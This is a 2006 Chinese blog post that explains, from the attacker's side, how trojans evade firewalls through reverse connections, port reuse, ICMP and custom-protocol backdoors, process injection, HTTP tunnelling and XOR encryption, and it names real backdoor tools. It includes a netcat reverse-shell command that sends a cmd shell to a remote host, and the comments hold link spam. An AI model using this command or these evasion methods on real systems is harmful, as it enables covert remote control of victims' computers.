金华网站建设-义乌网站建设-浙江网站建设

金华网页设计-义乌网页设计服务-浙江网络安全维护 提供企业网络安全维护、企业网站建设、企业网站维护、企业服务器维护等服务(金华服务器维护-义乌服务器维护),咨询: 张先生 15924245918 QQ:
posts - 65, comments - 95, trackbacks - 0, articles - 3
  IT博客 :: 首页 :: 新随笔 :: 联系 :: 聚合  :: 管理

解析木马如何穿过你的防火墙?

Posted on 2006-12-24 15:52 网工地带 阅读(232) 评论(2)  编辑 收藏 引用 所属分类: 网络安全区
解析木马如何穿过你的防火墙?

网络不太平,谁上网都会架起个firewall来防护网络攻击
这岂不是给我们木马的生存带来了巨大挑战?
物竞天择,适者生存,嗯...要想生存下去就要穿墙! Bypass Firewall:

1.首先就是No Firewall(允许本地对外监听基本上任何端口),没有防火墙?(这不是废话?)
对付这种机器好办,随便哪个马一般都行
典型代表 Radmin(其实它不是马,用的人多了,也就变成了马,无辜)
rdp 3389/tcp (远程桌面,它也不是马,不过你不用,还有谁用呢?)

2.端口筛选(只允许外部连接特定端口,也就是外部对特定端口发起syn连接请求才被接受,从而完成三次握手,建立连接,否则防火墙丢弃数据包,无法完成握手,无法建立连接,也就是木马不能随意开个端口就监听了)
道高一尺,魔高一丈.:
    你不让我连你,我就让你连我呗, 反弹端口技术诞生了(一般防火墙对本地发起的syn连接请求不会拦截)
使用工具netcat就可以穿刺这种防火墙 :
    nc -e cmd.exe 远程ip 远程监听port   
    将会反弹一个cmdshell给远程ip主机控制,,这种方式好就好在可以控制没有公网ip的受害主机.

    随后,端口复用技术也出现了,复用防火墙开放的端口:如80,21,445等
典型的后门如hkdoor,ntrookit(作者都是国人yyt_hac )
    还有利用无端口协议来通信,如利用icmp报文,(Ping就是利用的ICMP协议的 Echo Request和Echo Reply探测主机存活)
典型的如pingdoor (Ping由于使用icmp报文,根本不开放端口,端口筛选也就无可奈何了,但是icmp并无差错控制,所以这种后门的传输特性也并不理想,除非自己加上差错控制)
    更牛的,就是干脆抛开TCP/IP协议,木马自定义协议进行通信,你防火墙能把我怎么样?哈哈
典型的如ntrootkit采用了自定义协议技术.

3.应用程序筛选.(只允许特定程序访问网络)
    木马也不甘落后,自己不能访问网络,只好寄人篱下:
    进程插入技术诞生了,通常firewall都要允许iexplore.exe,explore.exe,svchost.exe,services.exe等程序访问网络,于是木马便盯上了这些程序.插入...插入再插入
现在的远程控制一般都是插入进程式,一是隐蔽(没有自己进程),二是穿墙.典型如Bits.dll(替换系统服务BITS,插入svchost.exe中) 和灰鸽子/PcShare(默认插入iexplorer.exe浏览器进程)等.

4.协议筛选.
(例如,只允许80端口通过http协议,这样那些端口复用的后门没有使用http协议,不幸被防火墙拒之门外.:-)
怎么办? 暗渡陈仓, 挖隧道: http-tunnel (http隧道)将木马通信封装成http数据报进行传输.
使用这种技术的有pcshare(使用双向http隧道传输)

5.IP过滤,一般就是化分为本机,局域网,广域网三个层次,不过木马也不是吃素的,有些木马已经开始智能化了:
比如,无法连到黑客主机或者跳板,就搜索本机的代理设置,如IE代理设置,然后代理出去!
可以想象P2P形式的马也将于不久以后成为可能,这样木马和僵尸网络的区别就更小了 呵呵

6. 现在很多防火墙都可以检测传输的敏感信息,如用户口令等,所以抗IDS,抗自动分析,这便成了高级木马需要考虑的东西,换句话说保护黑客控制的安全性和隐秘性.典型的解决方法就是采取加密措施,如最简单的对付IDS检测的方法,xor异或加密.

但是现在的防护墙肯定不是以上技术的分离,而是一定有多项技术同时采用.
同时,综合利用以上对抗技术的木马也不鲜见了.
木马和防护墙 永远是一对矛盾,彼此斗争,彼此发展.呵呵

Feedback

# re: 解析木马如何穿过你的防火墙?  回复  更多评论   

2006-12-28 22:01 by 上海数据恢复
可怕
<a href=" http://www.zxdata.com">上海数据恢复</a>">http://www.zxdata.com">上海数据恢复</a>
<a href=" http://www.zxdata.com ">数据恢复上海</a>
<a href=" http://www.zxdata.com">RAID数据恢复</a>
<a href=" http://www.zxdata.com">SQL数据恢复</a>
<a href=" http://www.zxdata.com">上海数据恢复</a>">http://www.zxdata.com">上海数据恢复</a>
<a href=" http://www.zxdata.com">硬盘数据恢复</a>
<a href=" http://www.zxdata.com">服务器数据恢复 上海</a>
<a href=" http://www.zxdata.com">上海 服务器数据恢复</a>

# re: 解析木马如何穿过你的防火墙?  回复  更多评论   

2007-03-26 15:55 by 上海数据恢复
[url=http://www.raidcn.org]数据恢复[/url]
<a href="http://www.raidcn.org">数据恢复</a>
只有注册用户登录后才能发表评论。